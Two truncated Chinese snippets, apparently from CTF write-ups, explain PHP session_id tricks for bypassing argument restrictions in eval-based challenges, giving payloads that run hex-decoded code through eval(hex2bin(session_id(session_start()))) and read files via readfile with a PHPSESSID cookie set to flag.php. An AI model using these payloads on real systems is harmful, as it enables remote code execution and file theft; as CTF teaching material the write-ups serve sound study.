在session_id中设置我们想要输入的RCE,达到传参的目的,但是第一点需要session_start()开启session会话。 payload:code=eval(hex2bin(session_id(session_start())); hex("phpinfo();")=706870696e666f28293b 可以成功命令执行。 第二种:post/get传入参数 get_defined_vars ( void ) : array 返回由所有已定义...
因此我们在请求包中cookie:PHPSESSID=flag.php,使用session之前需要通过session_start()告诉PHP使用session,php默认是不主动使用session的。 session_id()可以获取到当前的session id。这样可以构造payload:?exp=readfile(session_id(session_start())); 达到任意文件读取的效果: 任意文件读取...